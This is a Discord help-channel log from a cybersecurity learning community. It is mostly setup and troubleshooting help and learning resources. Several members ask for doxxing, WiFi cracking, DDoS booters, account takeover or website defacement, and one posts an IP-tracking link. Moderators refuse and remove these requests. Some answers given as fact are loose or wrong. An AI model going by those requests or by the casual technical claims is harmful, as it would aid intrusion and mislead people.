#👥・help-me
1 messages · Page 15 of 1
Hmmmm?
@shadow fractal
@austere summit just block that person
I have
It’s just that I want to know who he is
And if he is someone that I know
From school or smth
Have you tried asking him
No
You never know it'd work
Maybe
@austere summit and we are not going to hack him we are a ethical hacking server
It’s just that I dont think that he would follow me so we can message on TikTok
Ik
But do u know a server that is gray hat or black hat
What you want?
That will help me
Aren’t u a gray hat
And?
Please stop asking for these type of things
Jesus
Peeps already tried to explain to you
Ik
Report him
I have
All I want is to know if it is someone I know from school
Thats unethical, we do not do that here
Nor provide places or people who do
Side note @austere summit
You give out too much personal information
True
7 to 18
Right
Hello friends, how are you? I'm new to this field of reverse engineering. Recently, I wanted to create a bypass to enable an app on an emulator using the device ID of another device that is already enabled. I managed to write the script, but it only logs into the account, and when it reaches the other sessions, the device ID is automatically disconnected, and it doesn't work properly throughout the app. Could someone help me?
My name is my name my name is slim shady
Numbers beyond 18 exist
Are there other ways for hacking and accessing WiFi passwords than just using word list and spraying passwords
Why are you asking questions about WiFi hacking?
Anyone know how to code
Depends who you're asking, depends what you want
Ok
You could want a web scraper using qt in python, you could want a animation on a website using javascript, you could want a browser made with java. What's up?
Looking for a program that can edit/freeze a balance on a website
... on a banking website?
Yeah something like that
What for?
Golden-farm.biz to freeze my crystal balance
And why would you need to do this?
I see that it's an affiliation program to acquire money?
I got the account from someone it's got a lot of gold on the account but i don't have money to topup the its really expensive
Hello there I apologize if I'm interrupting anything I'm not sure if this is the right place to ask this but Im hoping to find someone that can help me solve a problem, I build mods for beaming and I have a member that is posting my stuff on reddit re uploading them to google drive. I would like to identify this person so i can ban them, any help is appreciated
We are a cybersecurity community, not a vigilante for hire hacking server
fair enough I figured stealing would qualify for some help but have a nice day
That's where you pick up the phone and call a lawyer or the authorities. Have a good day
What do y’all recommend for storage when it comes to IOS? I know of Dropbox and of course google drive but are there any hidden gems out there?
@hushed island Nas
Is there a problem?
Hey guys I have Debian 12 installed and it doesn't let me use my wireless wifi. Anything I could do to fix this. I did Install the latest kernel
do you have it setup as a VM?
Hello everyone, help a beginner.
How can I practically secure my company server from
Cyber criminals. What tools are best, how can I
perform vulnerability tests and real time
monitoring. Thank you!
is there any way i can view a private twitter accounts posts?
You can perform vulnerability test using software like openvas or nessus for real time monitoring a software/hardware that can perform like a ids or ips would help there are also the need of a waf and firewall i assume this is alrready implemented, a siem would help also... but i only know in theory.
Ok thank you.
Do you know of a good ids/ips tool please
You would also need to perform security test on the human vulnerability of your company and then train them. There are a bunch of ids ips it depend on budget and size... this is all theorical ...
You can get your company certified, or in the hand of security experts
For penetration there is also the tools for pen testing wich can be used from a linux distros
Yes, we need to know your intent before helping you out
ids ips tools list on google, reddit would help you to get the top list, there are open source alternative
It is used by most companies to test their security. It has so many useful features. Its was recommended by @ripe panther on a podcast
Thats... so cool thank for sharing (i mean it)
Anytime 🙂
Ugh, I hate companies that sell vulnerability scans as penetration tests 💀 (yes I know they clarify it a bit better, but the button of 'pentest now for free' really urks)
This one is different. Not like the others.
A 'penetration test' is fundamentally a process performed by a human (since it has to provide context like business impact / risk assessments). In that way, I don't believe that this tool (which looks neat and could definitely assist as one part of a pentest) provides a 'penetration test'
The website is run by a group of security professionals who create algrorithms that test for vulnerabilites like how a human pentester would
Yes, but a penetration tests output isn't finding a vulnerability and printing out that it exists
It's making a report that provides attack path validation (and also conceptualises what the vulnerabilities actually mean to the business in terms of risk)
Im not a professional so idk about this stuff
If I give you a report that says:
I got Domain Administrator because of CVE-2020-EXAMPLE.
That's not really doing my job, even if it mentions technical impact.
I'd have to say something more like:
I was able to access PII / SharePoint which could lead to insert relevant risk for that particular business type.
i thought they asses possible attacks points and weaknesses
Ofcourse bruh I have no intention of ganing access to others wifi.....I just want to hack into my own wifi network to see the process
I'm not hungry for internet data as I have my own internet connection
Can u help me with my github i just need help on authentication process and how to avoid that cause that's keep getting pop up in my git clone and i tried using another phone without the files and it also pop up a authenticate heres the link on my github
Can someone gelp
Im using termux
Okay, let's say you have a VPN server exposed to the internet that has RCE. What's the risk to the organisation? Can an attacker use that server to pivot in? Is there sensitive information on that server?
What if it turns out it's an old nearly decommissioned VPN server that has no active users, is not connected to the corporate network and doesn't really provide value
A tool can tell you what the vulnerability is (RCE), but it's usually not very good with understanding context
You're trying to git clone the repository using SSH, which I don't think supports anonymous auth.
Try using https
i.e.
git clone https://github.com/Angelo-genon/Tg_auto_send_bot.git
Also this repository doesn't actually have anything in it, it just has a file that has the directory listing
Oh thank you for sharing!
Thank you
Yeah wait i will try it
It says permission decline
What is the exact error... does it look like this?
Cloning into 'TelegramImageBot.git'...
git@github.com: Permission denied (publickey).
fatal: Could not read from remote repository.
Please make sure you have the correct access rights and the repository exists.
Idk i asked chatgpt and he gave me README.md and respository file and i still dont know why its asking for authentication log in when i used git clone
Look if you don't know what the error looks like, has in it or means then it's hard for me to help you debug
i.e. This is what basically the current conversation has boiled down to:
Hey man I have a problem with my microwave.
Is the problem that this specific thing happens?
idk
I can't really help from there 🤷♂️
This is the git clone https://github.com/TelegramImageBot.git
If i use this it says authentication log in then i use this one its works sometimes git clone https://github.com/Angelo-genon/TelegramImageBot.git
But when it works the pip install -r requirements.txt is the one thats not working
Okay well the first one will never work since you need the full URL (username/repo.git) and not just (/repo.git)
It also should be the name of the repo (tg_auto_send_bot) when you are git cloneing
Now when you git clone your repository, you can see on the website that their are only two files:
- README.md
- TelegramImageBot
So it shouldn't be finding a requirements.txt
I think you should probably go back and review how to add / commit files in a folder to a git repository so you can make sure your repository isn't malformed
What should i add?
I put the necessary files like pip requirements and its the one thats having the error ERROR: Could not open requirements file: [Errno 2] No such file or directory: 'requirements.txt' here's the error message in my moms phone
Your git repository doesn't contain a requirements.txt file
When you're pulling the git repository onto a new device, you aren't receiving all the files that were in the original folder on your other machine, you're only receiving the files that have been added to the repository
https://github.com/Angelo-genon/Tg_auto_send_bot/blob/main/TelegramImageBot it does have requirements
Hello everyone, help a beginner.
How can I practically hack affiliate offers on cpagrip and cpalead.com
Guys which programming language should i do?
I happnd to learn Python, C, Java in academics but i don't think im strong in any of them
Also, is DSA recommend?
Okay, if I post this in chat, does that mean you have my files?
Folder/
│
├── MyPassword.md
└── cool_file.txt
You're just looking at the content of the file TelegramImageBot, and that file just contains text
If I clone your repository it only has the files TelegramImageBot and README.md, nothing else
Again, I'd go learn a bit more about git and how to create a repo etc. because that'll probably benefit you in the long run
how do i get unmuted
anybody knows why everytime i restart og open my pc i have to reinstall nvidia driver and then restart for my grapich card to work
I'm not sure what could be causing that but give NVCleaninstall a try
ye ima try actually forgot all about that
iam come back if it dont work
🙏
??
Uh, my school laptop is FILLED with viruses, i cant download whatever i want cause school blocks them. The only websites i visited are poki (game website all my friends use) and territorial.io which is a game and youtube. Im getting like 10 warnings from mcaffee even tho i havent downloaded it, i have other 💩 warning too
I can send ss
I turned off camera, wifi, bluetooth, microphone
And im actually being SPAMMED
What device are you on? And have you tried using a portable version of an antivirus to remove the viruses for you?
Im on HP chromebook, i have no idea how to do a portable antivirus. I asked my a relative that works in cybersecurity but they told me not to press anything and give this laptop back to the school. Which also means i can get fined up to 400usd
I keep getting updates and weird stuff from all kinds of fake websites
Do you have any third party antivirus installed e.g Mc Afee or Avast.
Nothing
School doesnt allow
Chromebook Virus and Malware Removal guide. What to do if you think your Chromebook has a Virus or malware. Can a Chromebook even get a virus?
Ill try that rn
Do the ads popup when you are on the website only?
Cant do this, school doesnt allow me to access my google account or whats it called
Nope, i was in documents when it happens, but after shuttonh it down and oppening again i got it when i turned on wifi
Adware
ah
?
My Roblox account got hacked dm me if you can get it back
We do not do that here, #📜・rules, better to contact Roblox support
Oh ok srry
⚠️ Do's and Don'ts ⚠️
This server is a CompSci / CyberSec community, not a vigilante hacking server.
-# Since we keep getting a lot of requests for unethical bs, I have made this so people can THINK about their intent before they go ahead and ask. A lot of newcomers join with the wrong idea about what this server is, and what it isn't so let's clear that up. Anyone asking anything unethical, please refer them to this message, thanks.
Do
- Do use this channel for help, and support so long as it fits within the server's #📜・rules.
- Do react to this message to show you have acknowledged it.
Don't
- Don't ask for us to hack accounts for you.
- Don't ask us to teach you how to commit fraud.
- Don't ask us anything remotely unethical.
Simplified FAQ
- Will we hack accounts for you? No.
- Will we boot people offline for you? No.
- Will we identify someone for you? No.
- Can I ask you to DM? No, either use #📩┃ticket or #👥・help-me.
Jus use god Damn Google
hey does anyone know where i could learn hacking that doesnt cost a lot or is free?
portswigger labs are 1 of the best
thank you for the recommendation will check it out
Has anyone heard of a guy named Sedric Louissaint and his cybersecurity mentorship program?
Pentesting
- HackTheBox
- VulnHub
- Root-me
- Hack Me
- Over The Wire
- Hack This Site
- The Web Security Academy
- Defend The Web
- Damn Vulnerable Web Application
- CTFlearn
- Letsdefend
- Hackers Arise
- Portswigger
- TryHackMe
- Pentesterlab
- Hacker101
- OWASP Juice
- Pentest-IT
- Pentester Academy
- AttackDefense
- Avatoo
- HackUCF
- Hacking-Lab
- Immersive Labs
- CyberBit
- Hacksplaining
- Rangeforce
- Parrot CTFs
- PicoCTF
Hi there,
I took an introduction to IT and Python in my college.
Was it enough, or should I study all the IT track?
I am going to study Network+ is that I am on the right way
@vale tiger
Oh okay sorry
Anyone know where to start to become an analyst?
cybersecurity analyst
If you do things with the government you'll need security clearance
Obtainable via the army
Easily the army
But there's certification
what certifications are good for this?
CompTIA
heard. thanks.
How do you get into ethical hacking?
@chilly merlin certification
Anyone has SOC relates materials for level 1
And don't forget to test in real target it's different
Hey everyone do anyone have any info on how to make a chrome extension work? Everytime i try running it. It says manifest file is missing or unreadable could not load manifest. The Coding language is JS.
You wanna make your own?
Hey I have a question
I’m actually a producer
I’m looking to get drumkits but for free
Is there anyway I can rip the drum kits from the server
?
So like for example if there was this website selling drumkits
Wdym for free
Can I trick the server
Nobody is gonna help you get pirated drumkits.... Do your own research on the topic... Then understand the risks associated with said pirated materials ....
Is there a way I could find them
By google forking
What do I search
The server is what has the folders right
Bruh... Do your own research... Now chill..
Wrong place my bad
Dm
wat
@boreal solstice
Tried to help you
Now I am here
Saw some things missing
Ahahaha
@boreal solstice @quasi berry
I cant type
In chat chat
😭
Bruh
Whyy the hell just happened
Wick happened in know but how
Oh lord
No gif perms either 😭
-_-
It works!
As long as it works for you
How long cant u chat?
😭
Dammit wick
Wick be doing too much fr
Welp, what happened happened
did u spoke to oni
okay
i litreally jus googled what fk off means
lmfaoo
Now its time to retaliate
hello, hope ya'll having a great day. im currently under attack by torgan mal ware or something. on my computer i did a factory reset already once and changed passwords but something is still on my system gaining access to everything and been locked out a few accounts... its frustrating since im a online alot, too dm me if your able to help;ill let whomever take control. i dont mind giving some compensation as well thanks have a great day!
@quasi berry
@harsh dew
You aren't under attack.
If you factory reset and you think so still, reimage the laptop
ill try the reimage thing and its a desktop. well everything was getting factory reset or changed Spotify just got into and changed it again but thanks for the help ill do that now
@valid belfry What if he just wiped the entire drive. Even the OS then reinstalling the original one
Reimagine is wiping the friven
Drive
When installing it'll format the drive and over write data
Anyone here I can learn from
Learn what@shy cosmos
@valid belfry I’m to all this and I’m ready to learn anything you want to teach me
thank you
I think it's less of "anything you want to teach" more of "Cybersec is very broad"
You guys have any suggestions on resources and material for learning heap vulns and exploits
I'm struggling to learn that
I'm trying to run Kali in VM box but I'm getting error. I did everything like Bombal said but it doesn't work 🫤
Any pathway on pentesting ?? I’m 17 , should I study in university or online courses ??
Dont know if i can post this here but im in need of a skilled smart contract dev. Please dm me if interested
does anyone know how to get an account back
an account for what?
steam lol
contact steam support
i have and still no response
rip
yurp
Can any one help me
Yerrrd
I know I asked this question before but I am trying to set up a hacking lab with an attack and victim machine, I want these two machines to communicate with eachother on the same network, in virtualbox I have many options but the two I see are best for a penetration test scenario are NAT network and internal network which one should I use?
pentesting way. first complete CEH then OSCP
I set up NAT on each device for internet, then have a host-only network for vm-to-vm and host-to-vm communication.
You can set up a DHCP server in the File -> Preferences -> Network -> Host-only networks menu
a payload refers to the part of an attack or exploit that performs a malicious action once a vulnerability has been exploited. It is the code or data that the attacker uses to execute specific actions on the target system. Payloads can vary in complexity and purpose, depending on the nature of the attack.
If you want attacker and victim to only be able to talk to each other and not your host machine, I'd do NAT + internal network but just be aware that internal network doesn't come with a DHCP server by default, you'll need to set up one by using VBoxManage
im new here
What do you need help with?
I am running Linux bare metal. Can I leave secure boot disabled. Cause if I didn't I couldn't download the wifi driver I needed.
And when I enable it again after installing the driver than my wifi doesn't work
Would this be a security issue or can I just leave it disabled.
does anyone wanna try hack my website ( i want to test out the firewall)
become a HACKER (ethical) with ITProTV: (30% OFF): https://bit.ly/itprotvnetchuck or use code "networkchuck" (affiliate link)
**This video sponsored by ITProTV
watch the entire series: https://bit.ly/cehseries
➡️➡️➡️Download the tools in this video: https://networkchuck.com/hacking-lab/
che...
Use a bridged adapter to make your vuln machine accessible through the same network as your pc
Hii there ,
Anything on my kali linux is working slow i figured it out from youtube
It updates with speed of 200kbps although i have good internet
If someone could help
No brother am using it as main machine
when installing a package, what speed is it at?
Hi Lydia.
hello, Cookie :3 hru?
aww i feel it, i hate working fully remote cause im too social for this field XD
So before I knew anything. I bought a MacBook with very little storage. Any CPU recs?
In need of a skilled smart contract dev. Please dm me if interested
Any tips on getting Shell on this?
PHP 7.4.7 phpinfo()
Apache 2.4.38
I got some code execution through the browser but none of my metasploit exploits work. Feelsbadman
Hey red
hey red
Hey Sudo
does anybody know to easily subnet for CompTIA test
What's the best way to transfer the resources to obsidian?
Is there any chance of someone getting my IP just from an Instagram account? I have a few points to make, in case anyone is interested in helping me
There is no change they get your ip from instagram. Unless it’s from instagram themselves but they can get a ping of your location when you sign in from a new device.
I don't remember if I logged in via my phone at the time, but I don't think so. In any case, the information was almost minimal, so I really doubt it
I even read the guidelines on how Instagram recommends an account and apparently mine didn't fit in at all, it was practically invisible. Well, thanks for your help
so who teaches here?
You want to learn subnetting for comptia?
thats easy bro
i can easily track your ip through some links
tap on this
Don't share ip logger links
any one from United States, North Charleston ?
okey
Good, you can delete it now
It really be like that sometimes😭
Hello guys
What do you think about the cisco network academy course : junir cybersecurity analyst
CCST
I need to change my mc account to another email, how do I do it?
Are you logged in?
In the microsoft account?
Log in to the account you want to make changes on
Do I then put the email i want as the primary alias and remove the old one?
Do you see the option there?
I don’t know if your mc account is linked to Microsoft
But yeah that is prolly it
Is it true that you can request the microsoft account back in the span of an hour after you changed it to another email?
Can qe talk in dms?
I’m not sure about the time but most sites offer limited time to revert the changes made.
So if I theoretically did a trade with a guy, he could revert the changes?
But if I had his gmail he wouldn't be able to do it?
Well theoretically yes but this would be considered on ethical and goes against the rules.
If you have the email that was in the account prior to the change
So if I have his email he won't be able to revert the changes right?
hey i got a question i have my own dc server right but i cant seem to be able to set up the bump bot😅 can someone help me??
Cisco says you can get an entry level job as a junior cybrsec analyst with that course...idk if its true. But I guess it depends on the location
Hey Guys does any one knows abt on how SEO is being done
Welcome
Hey if anybody can help me understand that my's dc account keep getting hacked, this is the secomd time that this happened I asked him that if he click on some unknown link but he said no. Now I'm interested to know what are the possible reasons this keep happening
Are there any other routes or recommendations to study online? CCNA certificate would this help for entry level job
Mine was also hacked and I was kicked out of this sever coz the hacker was sending steam links on this server chat through my dc account
My dc was never hacked before till I joined this server
Change your password, enable 2fa and enable a passkey if you can. Then go to authorised apps and deauthorise ones that you don't recognise.
Guys
Today at 3:39 PM
I wanna learn how to deface websites
Can somone help
I run windows
Am willing to do vm tho
Dm me if u can help, me
not here pal
kindly check #📜・rules
we do not encourage that here
I’m sorry I didn’t clarify that I meant for like penetrating
Penetrating
Pentesting
My bad
Penetration testing doesn't involve website defacing.....
Sure there's a bug that you could hunt that could do that. But if you found said bug there is higher impact than defacing the site...
I’m sorry I’m new I meant like to test peoples sites with permission
rip
as of now jus keep in mind
Ok
we aint gonna ban u or something
I'm not going to ban you but instead point you in the right direction to learn web app pentesting and a place to hunt ethically... Id suggest to check out portswigger academy... Do your own research. And hackerone or bugcrowd, just remember to stay inside scope or you could get in trouble...
I js feel bad I had no bad intent yk
Tysm man I’m gonna learn
trap is good guy dont take us wrong we seen peeps making same kind of requests soo
i still dont know where to start learning hacking bro im learning a little bit of everything does someone know best place to start
Who needs help
i need help
With what
@valid belfry on this
any idea will be appreciated
I need help pls
with what
I want to learn Hacking
What's SEO
Senior Executive officer
Got my Security + a month ago. It is the only cert I have. What should I do? What others would be helpful to have to better my career? Currently in a role as an IT consultant with an MSP
Wnat is a virus header?
Can anyone dm me a roblox installer
If you want an entry job as a cybersec analyst, Cisco Academy said all you need is this free course https://skillsforall.com
Hello. Check under the pinned comments in #1181325692823150642 . You can find a road map to learn ethical hacking.
A virus header, also known as a viral header or viral signature, is a unique sequence of bytes or code that is used to identify a specific computer virus or malware. It is typically located at the beginning of the virus code and serves as a fingerprint or identifier for the virus
What career path do you want to take
Kindly refer to the #📜・rules : )
Do you know how to change it?
I'm not going to help you carry out illegal activities. It certainly isn't allowed in this server
I wasn't asking you to help me change it
I was just asking do you know how to
But thanks for answering my question
Too many failed attempts for SMS verification on Google. I tried to recover it but the only option is from SMS what to do?
I can't get any support from Google
who know a legit free booter? @everyone
that's search engine optimization man
Please dont try pinging everyone. Just simply state your problem and someone will help out
Honestly. I’m just looking to move up the ladder
Yeah but to move up, you have to figure out what you want to pursue
is it cybersec
Pentesting?
anyone tried poly? i need a nudge
i'
i've gotten the start of flag and its memory address but struggling to get rest
Please I wanna setup Kali Linux on my system and I don't know how I gonna go about it
youtubeeee 
the reversing challenge??
Is not working when I installed on my system
yeah i;m struggling to get more then the memory address for the start of the flag and finding a few functions for randomisation
Is showing Kali Linux aborted
Havnt been able to get much more from patching either
What should I do please help
i’ll need to check if i’ve done it or not because i forgot 😦 i’ll let you knoww
wdymm kali linux aborted??
Appreciate it it’s still active but any little nudge helps atm
okii i’ll try when i get time off workk 💜
vmware or virtualbox??
Virtualbox
ahh okii. i use vmware so idkk it might be a configuration fault
no suggestions 🙂 both vmware and virtualbox are good!! you can also use a kvm
Okay
Do y’all trust malwarebytes to get rid of viruses and malware on Mac ?
Install Kali Linux on Windows 10 in under 5 minutes (full tutorial) using WSL 2. (Windows Subsystem for Linux 2)
➡️Support NetworkChuck: https://bit.ly/join_networkchuck
☕or buy me a coffee: https://ko-fi.com/networkchuck ☕
Checkout @davidbombal 's WSL2 playlist: https://bit.ly/2NOFcem
(affiliate links below)
🔥🔥BOSON SUMMER SALE 25% OFF EVER...
@solemn leaf Ask if you run into any problems or if you need help
What error code is presented?
does anyone know where to start hacking like the basces, i want to learn how to keep my self safe and might do a prank on my brother????
any tips or anything to help me start????
Try hack me is the easiest starting point but also be prepared to go through the boring stuff to there’s a lot of information especially if you don’t have an IT or software background before hand
Otherwise you can try hackthebox academy but it’s paid
what about tryhackme someone told me its good and its free
im using it rn its showing me how to hack a bank account without safty stuff
Yes that was the first one I mentioned it’s generally looked at as an easier entry point I don’t use thm much I’m mostly using htb but thm is free and a lot simpler
okk thanks for the help
I'd say THM is an easier introduction when you're completely new. HTB is definitely more starter-friendly then it used to be, but I'd say start with THM first, and then move to HTB.
Thank you for this information
$ searchsploit <service>
I can assume that there is no chance unless hackers find a entry on the blade sv of insta, but I'm not a expert so. Check up on that
Also if your concerns about the IP and not your location. For most ISP as long I know they provide a range of public IPs among their clients. So it eventually changes after a determined time or if you stop using it. If you don't want to get pin pointed, you could mask your IP into a secure tunneling like a VPN
Unlog from any unknown device. Change password (use a very strong one), use Two Factor Authentication. Change your secret questions. And if it keeps happening, it may be a local factor near your device. Check for Trojans or viruses that track your activity. Or maybe you have some joker nearby
Get a roadmap!!!
Since you've mentioned that you've been exploring a bit of everything, it's time for you to specialize in one area. Find a roadmap that shows you where to start and in no time you'll be taking your own path without even realizing it!
I'll reply the same to you ^^
The hell??
The only closest thing I know is a header file, they usually ends with a .h extension but they are not directly related to virus but programming.
Ahhh that is what the antivirus is searching for when it is scanning the device?
What do you mean with "failed"
-
VirtualBox/VMware
-
Install Kali Virtual Distro
-
Choose the right options right after you installed it (check up on internet resources)
-
Update & Upgrade your stuff and you're ready to go!
A piece of advice you didn't ask for but I'll give it to you anyway because it applies to a lot of people here. If you have a question, learn to start with your own research before asking the community.
Communities can help you with specific problems but what's the point if the basic mentality of a hacker is their ability to do research!
Go for a Roadmap!
Not really.
So?
The sms verification from Google recovery it said need wait for few hrs but I waited for a day still can’t verify
Idk the nature of that issue, but I can assume that for every try, the span time increments, if that is true, it could be a security feature.
You could also try using a different environment, like from web browser to app
hey
can anayone help me
i want to setup c and c++ on my visual studio code
and i am not able to do that
I can help out @mystic wyvern
pleasee
Have you downloaded VScode?
yeah
You should know VSCODE comes prebuilt with all programming language support, even for c and cpp
okay
You can install extensions that support Cpp and C
i did
Send it in dms. You can't send it here
One sec
sure
At least this are the steps I followed:
You will need some extensions in order to properly implement a C/C++ program in VSC and there is two approaches
To run a C/C++ program you will need a compiler my recommendation is GCC (GNU C Compiler)
Novice Mode
- Install C intellisense on VSC
- Install TMD GCC and the extension C/C++ compiler in VSC (The extension provide the link itself for the installation)
Advance
- Install MSYS2 (For windows) and therefore, install Mingw64 (It will come with GCC installed)
- Configure environment variable PATH for MSYS2 and/or mingw64 (Check that on internet)
- Install CMake
- Install C++ Cmake extensions (Check that on internet)
Configure a project
- Configure Cmake so it creates you makefiles you could use to build your project.
If you are just starting I recommend you the first option @mystic wyvern
i did it but then also its showing me an compiler error
Command for compile your programs in the terminal itself is g++ <filepath> -o <outputfilepath>
try g++ --version on your terminal
You may have to configure environment variables on your PC
Edit the System Environment Variables >
Environment Variables... >
System Variables >
Path >
(Add the folder where your compiler is in)```
you said you have tried to compile it already?
Share the code you have tried to compile
just a normal printf code
check ur dms
Why are you sending it through DM?
its an screenshot
Ok, I`ll recommend you copy and paste it here so more people can help you out
perms go brrrrr
And I don`t usually use DMs
From what I see you havent installed the recommended C++/C extensions
Click on install
why dont u just have a look at it
I already looked it
I already run him through most of these.
try this code instead:
#include <iostream>
int main(){
std::cout << "Hello World";
return 0;
}
still geeting error
@mystic wyvern open cmd and type g++ and send the output
You must include a standard library with the reserved directive #include in order to use C++ objects
Show me
sent
Seems like a lack of extensions, what extensions do you have installed?
sent
have you followed this instructions?:
https://github.com/danielpinto8zz6/c-cpp-compile-run/blob/HEAD/docs/COMPILER_SETUP.md#windows
You must install this: https://jmeubank.github.io/tdm-gcc/download/
He already has mingw installed. No need for all this @solar fiber
While he tries to run it from the C/C++ Compile Run extension, he must install TDM-GCC at least for that extensions
Requirements
- If you are on linux you must install gcc (see instructions)
- If you are on window you must install tdm-gcc (see instructions)
- If you are on mac os you must install clang/gcc (see instructions)
@mystic wyvern delete the Cpp run extension
this one ?
Yup
okay
But I also recommend @chilly merlin suggestion
i was asking about deleting it
Wdym?
he told me to delete
i asked
It is an option
this one ?
@mystic wyvern just follow everything in this video https://www.youtube.com/watch?v=KYxLEDF6kjs
Don't install cpp run extension
🔥DSA with Java Course Enrollment link: https://www.jennyslectures.com/courses/Mastering-Data-Structures-and-Algorithms-with-JAVA-66d7fe06b4f7fa3fb969f5c5
How to download and Install VS Code, How to download and install MinGW Compiler, How to configure VS Code to run C and C++ programs, How to set PATH Va...
Thank you for not giving up!
I`m a very bad C++ programmer but if you have any question don't fear to ask!
sure
I could also personally guide you through your first steps if you want
Just @ me from here!
everything good?
sure man it would help me a lot
I think!
now i need to get some sleeep gn
I don't think here is permitted to ask for hack an account
No Unethical Activities or Discussions!
Under no circumstance will any user aid any other user in helping to perform illegal activities such as hacking anyone or anything without consent. Additionally, vigilantism against criminals is considered unethical behavior and will not be allowed in this server.
Roblox is a pred cesspool
Ask @ripe panther , I'm sure he knows
okay guys,
i need vps to run kali basically so that i can use termux to ssh and use on the go
so are there any free vps i should check out
like im broke rn
Just stay away from evil Oracle
word of the wise!
how is aws for the change?!
What is vps?
Nice, I’ll have to check it out!
yeah your gonna have good time
plus if you get a vps with good hardware you can do some heavy loads on that
Rocking a cluster of 3 servers on Hetzner, cheap & powerful
Not a VPS though, bare metal, no clicky clicky and everything is installed. Not for the beginners
for a while i was actually thinking that i would just build my own system and open ports
is that gonna be really dumb or fair plan?
yeah
basically a kali instance and some docker apps
But what do you need exposed to the internet for that?
i was wanting to remote access it
In that case, just setup a VPN on the system and VPN into it
owh that a really good idea!
Best approach in that case
You don't want to expose anything to the internet If not necessary, and especially not on your home network
Some great video's on YT for selfhosting stuff, might wanna check that
NetworkChuck, TechnoTim
sure i have to check them out
its time to use my old system and put into good use
Christian Lempa also good
i havent heard of christian lempa have to check out
Lmao
hello everyone
@uncut wedge did you end up finding any of your notes for poly
Who the fuck needs help today
You?
Hey does anyone know anything against ddosing i own a game server me and the whole staff team just got threathened there going to dox us and ddos server
Idk hiw to ip ban someone 😅
Help
Where is the nvme slot
It got disconnected I think
And now idk where it is
Thank you default
I can't share images so I have to share the link 😭
Np 🙏
Ok
Well
That's the issue
Idk where it is
It's gone
Can u hop on vc
I cam show it better
Cause this is annoying
https://www.techradar.com/how-to/how-to-install-an-m2-nvmesata-ssd-on-your-pc this one can help you better
Do I need to remove my gpu
For it to be revealed
Well it depends on the motherboard
Lemme check
nah just turn off the Power supply and unplug the computer so you don't get electrocuted
Rog hero maximus z790
I unplugged
yep do that
to stay extra safe why not
I turned it off just incase
Cause tbh when I disconnected the pc it stayed on for like an extra 10 secs
If u can vc il be in gen
Suffering
Game server? On what exactly?
She/he might be talking abt a Discord server I'm not sure
You can't ddos a discord server right?m
Ah I just read it
They probably didn't get your ip
Nope they can't
Hello everyone
Which is why I was skeptical about what server it is; I checked their msg history and they were talking about a Discord server so that's why I'm thinking that is what they are referencing. If that is the case then they don't need to be worried about their server being ddosed
Well anyone can ddos an ip belonging to discord but it wouldn't do anything to that one specific server
Is a masters in cybersecurity worth it?
Yes
heard. thanks
with what @dapper charm
Hey. Welcome to owlsec
What do you need help with @dapper charm
already asked him pal
anyone does CTF?
check ur dms
I'm not using my voice 👀
bro just for 2 min because here i cant decribe
Just try. I'll understand
some one help me pwease my python file wont output in vsc
@chilly merlin have you tired running the file outside vscode?
yes
What did you use?
the code works in pycharm
How did you run it in vscode?
i created a file named it test.py
its in my downloads folder
the code is just a basic addition calculator
omg im so fucking dumb its cause i have a java file open too thats why it wont run
i thought vscode would just know what file to run
im so confused well now it works but it works with java file open too
th was that about
Okay 👍
I am here
Let me guess, another unethical request
He didn't ask. But I don't think so
Ah okok
Is there someone very wise and experienced who could advise me with my problem?
Well very wise I don't know, but what's up
and what is your problem?
sup
Hello fellow Arch gangster
hey hey
Yeah, just leave it. Already got a DM. Not really something you want to answer 🙂
yeah got a dm too
yeah 100%
only if you could see mine 💯
No idea
Could be that the system power board or the main board.
If there is absolutely no sign of life (lights etc), probably the power supply
Maybe
Maybe not.
Is there a dedicated GPU in there, or onboard graphics?
I don’t know how skilled you are and if you have the tools but for some systems it’s a bit easy to inspect the power board and find out if it’s supplying power to the motherboard.
Since the system doesn’t not detect being plugged in
I have a couple of laptops laying around and I’m a bit handy with this
Sometimes power surges can ruin your power board and in few cases mother board as well
It sounds like it could be a problem with the motherboard or CPU, especially since you're getting power (fans and lights) but no display or BIOS. It’s probably not the CMOS battery, since that usually just causes BIOS errors, not a total failure to boot. It could also be an issue with the RAM or GPU, so it’s worth testing with just one stick of RAM and no GPU to see if anything changes. If that doesn’t work, the motherboard might indeed be the culprit, and you may need to replace it.
Pulling the CMOS to reset BIOS might also be worth a shot
Probably not the culprit, but you never know
How can i make a bot that show every message by a user ? Like a log bot
Ok
I’ve had similar situation but the issue was the power board. Happened when I had a power surge at home.
Ok I looked it up and read that the GA-Z97N-WIFI uses a 24-pin ATX power connector, located at the edge of the motherboard. Check that the connector is seated properly and there are no signs of damage to the pins or wiring.
You can try asking searching AI to get more clarification of what the situation is.
Could also be something else.
Not the power board
anybody know how i can get ccleaner professional for free
You’re most welcome
Can anyone tell me why does it say "You cant run this file on your PC"
We don't offer support for cracked software / pirating
appreciate for that
Do I need a university to become a cyber security expert?
nope
self study
many sites say that it will be difficult to find a job without a university degree thanks for the information By the way, my English is not very good, sorry if I said something wrong.
You have a faulty RAM stick, like i thought
What are some alternatives to PyInstaller or Nuitka for converting Python scripts to executable files without displaying the console window (avoiding the flashy command window), even when using --noconsole? without launching a terminal in the background.
The problem can also be the ram slots or the mother board or the rams.
Hello, I need help with an error I get when I try to update my system and I dont have enough free space. error: Partition /boot too full: 20466 blocks needed, 18349 blocks free
Arch Linux KDE Plasma
What is the output of "pacman -Q | grep linux"
@coral cedar here
ohk
You probably have a few old and unused kernel versions
archlinux-appstream-data 20240526-1
archlinux-keyring 20240709-1
github-desktop-bin 3.4.2_linux1-1
github-desktop-bin-debug 3.4.2_linux1-1
linux 6.10.8.arch1-1
linux-api-headers 6.10-1
linux-firmware 20240809.59460076-1
linux-firmware-whence 20240809.59460076-1
util-linux 2.40.2-1
util-linux-libs 2.40.2-1
this is output the command gave me
hope everything is good
Ok ok, seems fine
yeah, partitions are super confusing too me
hyy guys
can anybody tells me best autoamtion tools for bug hunting to find bug , vulnerability
like - katana tool
xss_vibe
tell me if you know anything
What is the output of:
df -h
ls -lah /boot
For automating bug hunting and vulnerability scanning, consider tools like Burp Suite for comprehensive web application testing, OWASP ZAP for open-source vulnerability scanning, Nessus for network vulnerability assessment, and Nikto for web server testing. Wapiti and Arachni are also useful for web application security, while Amass and Recon-ng aid in network mapping and reconnaissance. These tools can significantly streamline the process of identifying and addressing security vulnerabilities.
do you want screen shot or just copy n paste
Cant post SS without picperms
oh
drwxr-xr-x - root 31 Dec 1969 .
drwxr-xr-x - root 16 Jul 21:23 ..
.rwxr-xr-x 127M root 7 Sep 16:14 initramfs-linux-fallback.img
